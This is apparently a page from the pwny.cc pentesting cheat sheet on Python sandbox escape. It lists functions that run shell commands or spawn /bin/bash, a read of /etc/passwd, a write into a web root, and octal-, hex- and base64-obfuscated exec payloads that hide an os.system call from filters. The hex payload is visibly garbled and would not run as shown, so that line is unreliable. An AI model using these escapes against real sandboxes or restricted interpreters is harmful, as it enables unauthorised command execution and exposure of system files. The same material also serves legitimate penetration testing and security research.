pwny.cc
Search…
Sandbox Escape

Python

Command Execution Libraries

1
os.system("ls")
2
os.popen("ls").read()
3
commands.getstatusoutput("ls")
4
commands.getoutput("ls")
5
commands.getstatus("file/path")
6
subprocess.call("ls", shell=True)
7
subprocess.Popen("ls", shell=True)
8
pty.spawn("ls")
9
pty.spawn("/bin/bash")
10
platform.popen("ls").read()
11
open("/etc/passwd").read()
12
open('/var/www/html/input', 'w').write('123')
Copied!

Executing python code

1
#Octal
2
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
3
4
#Hex
5
exec("\x5f\x5f\x69\x6d\xIf youca70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
6
7
#Base64
8
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
9
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
Copied!